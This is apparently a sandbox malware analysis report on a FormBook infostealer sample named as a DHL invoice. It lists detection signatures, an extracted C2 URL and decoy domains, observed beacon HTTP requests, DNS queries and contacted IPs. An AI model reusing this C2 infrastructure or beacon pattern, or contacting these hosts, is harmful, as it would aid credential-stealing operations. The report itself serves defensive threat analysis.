Windows Analysis Report
COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Overview

General Information

Sample name:	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Analysis ID:	1482411
MD5:	5ec011058b0884bc3b13563f97231c58
SHA1:	9846a460d630ea60c476df6dc92ae10d902bb54f
SHA256:	bc5a7642799c2f22d513dc19fb87848ecbe002f1815b2d5fd3a5af3fdbcdf0ae
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Found malware configuration

Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.crucka.xyz/jd21/"], "decoy": ["thepowerofzeus.com", "tampamlr.com", "00050591.xyz", "dominomusicmktlnc.com", "ai-defi.wiki", "tyumk.xyz", "gbqspj.club", "fostertv.net", "batremake.com", "nelwhiteconsulting.com", "amsya.com", "urbanholidayz.com", "463058.photos", "anag-gioielli.com", "kjsdhklssk73.xyz", "islarenta.com", "designed4lifecoaching.com", "autohotelsecrets.com", "susansellsmarin.com", "studyflow.xyz", "xdigistore.cloud", "zaib.art", "cabaiofficial.com", "lpocaxdb.xyz", "suziebujokmarketing.com", "skin-party.com", "maioral-store.com", "stellar-paws.com", "bfutureme.com", "slsmbcxw.xyz", "tech-with-thulitha.site", "kapten69pola.xyz", "carbon.services", "nourishingwithgreens.com", "ye78.top", "15ecm.com", "jeweljuice.store", "fasci.online", "ilovetvs.com", "85742668.com", "arthemis-168bet.site", "shangrilanovel.com", "somitk.online", "uhug.xyz", "dzaipu.com", "freyja.info", "senior-living-64379.bond", "p-afactorysale.shop", "vxjmjnwu.xyz", "fireborn-weldandfab.com", "californiacurrentelectric.com", "mantapnagita777.com", "tltech.xyz", "mrc-lithics.com", "marzottospa.com", "alivioquantico.com", "mercarfi.top", "bougeefilth.com", "suttonjstudio.com", "b2vvuc00.sbs", "pepenem.lol", "71421626.com", "viralvoter.com", "lvinghealthy.com"]}

Yara detected FormBook

Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Windows\explorer.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.348238153.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347630446.0000000002A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.356992362.0000000000720000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348109061.0000000000430000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348482025.0000000000590000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.356992362.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868679723.0000000002080000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.357247442.0000000001EF0000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.356948769.0000000000560000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868679723.0000000002200000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: cscript.pdbN source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.869745021.000000000880F000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868627962.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.00000000028AF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: cscript.pdb source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_012ADBBE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0127C2A2 FindFirstFileExW,	0_2_0127C2A2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_012B698F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B68EE FindFirstFileW,FindClose,	0_2_012B68EE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_012AD076
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_012AD3A9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_012B979D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_012B9642
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_012B9B2B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_012B5C97
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0035F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,	4_2_0035F0D3

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 4x nop then sub dword ptr [esp+04h], 0Ch

4_2_00355AD1

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 192.185.209.182 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 65.21.196.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.00050591.xyz
Source: C:\Windows\explorer.exe	Network Connect: 84.32.84.32 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.thepowerofzeus.com
Source: C:\Windows\explorer.exe	Domain query: www.arthemis-168bet.site
Source: C:\Windows\explorer.exe	Domain query: www.kjsdhklssk73.xyz
Source: C:\Windows\explorer.exe	Domain query: www.alivioquantico.com
Source: C:\Windows\explorer.exe	Network Connect: 185.107.56.60 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.203.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ilovetvs.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.crucka.xyz/jd21/

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe	DNS query: www.00050591.xyz
Source: C:\Windows\explorer.exe	DNS query: www.kjsdhklssk73.xyz
Source:	DNS query: www.uhug.xyz
Source:	DNS query: www.crucka.xyz

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=28cPGcaENb280W65HmbHU6pQLIPuemsbyE+toeghGUICUOM9gHK+zZW7s47qkPel79A7Dw==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.thepowerofzeus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=LcHXUWoW2sdPa4UFpuGqq/go6wrzpC/UeDgbPZxccUPKb44TjfXPeWdmbH3xVj13RIFx0w==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.alivioquantico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.00050591.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=4y1ij/qZRR1bNd/L/F5yLi+I0SkPKWffZZi+nDy9y9Wv5I2iqoZUG1btNWEB8myok8jbUg==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.arthemis-168bet.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.ilovetvs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.107.56.60 185.107.56.60
Source: Joe Sandbox View	IP Address: 84.32.84.32 84.32.84.32

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: CP-ASDE CP-ASDE
Source: Joe Sandbox View	ASN Name: NFORCENL NFORCENL
Source: Joe Sandbox View	ASN Name: OIS1US OIS1US
Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012BCF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,

0_2_012BCF1A

Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=28cPGcaENb280W65HmbHU6pQLIPuemsbyE+toeghGUICUOM9gHK+zZW7s47qkPel79A7Dw==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.thepowerofzeus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=LcHXUWoW2sdPa4UFpuGqq/go6wrzpC/UeDgbPZxccUPKb44TjfXPeWdmbH3xVj13RIFx0w==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.alivioquantico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.00050591.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=4y1ij/qZRR1bNd/L/F5yLi+I0SkPKWffZZi+nDy9y9Wv5I2iqoZUG1btNWEB8myok8jbUg==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.arthemis-168bet.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.ilovetvs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.thepowerofzeus.com
Source: global traffic	DNS traffic detected: DNS query: www.alivioquantico.com
Source: global traffic	DNS traffic detected: DNS query: www.00050591.xyz
Source: global traffic	DNS traffic detected: DNS query: www.kjsdhklssk73.xyz
Source: global traffic	DNS traffic detected: DNS query: www.arthemis-168bet.site
Source: global traffic	DNS traffic detected: DNS query: www.ilovetvs.com
Source: global traffic	DNS traffic detected: DNS query: www.bougeefilth.com
Source: global traffic	DNS traffic detected: DNS query: www.uhug.xyz
Source: global traffic	DNS traffic detected: DNS query: www.crucka.xyz
Source: global traffic	DNS traffic detected: DNS query: www.freyja.info
Source: global traffic	DNS traffic detected: DNS query: www.batremake.com
Source: global traffic	DNS traffic detected: DNS query: www.gbqspj.club
Source: global traffic	DNS traffic detected: DNS query: www.mantapnagita777.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 25 Jul 2024 19:36:32 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;

Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000003.00000002.869745021.0000000008CFF000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.0000000002D9F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://thebatcompany.fr/jd21?tBZLfTtx=GfbF6txqq2gI5hQXVs74X
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.00050591.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.00050591.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.00050591.xyz/jd21/www.kjsdhklssk73.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.00050591.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivioquantico.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivioquantico.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivioquantico.com/jd21/www.00050591.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivioquantico.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amsya.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amsya.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amsya.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arthemis-168bet.site
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arthemis-168bet.site/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arthemis-168bet.site/jd21/www.ilovetvs.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arthemis-168bet.siteReferer:
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batremake.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batremake.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batremake.com/jd21/www.gbqspj.club
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batremake.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bougeefilth.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bougeefilth.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bougeefilth.com/jd21/www.uhug.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bougeefilth.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyz/jd21/www.freyja.info
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freyja.info
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freyja.info/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freyja.info/jd21/www.batremake.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freyja.infoReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gbqspj.club
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gbqspj.club/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gbqspj.club/jd21/www.mantapnagita777.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gbqspj.clubReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ilovetvs.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ilovetvs.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ilovetvs.com/jd21/www.bougeefilth.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ilovetvs.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapten69pola.xyz
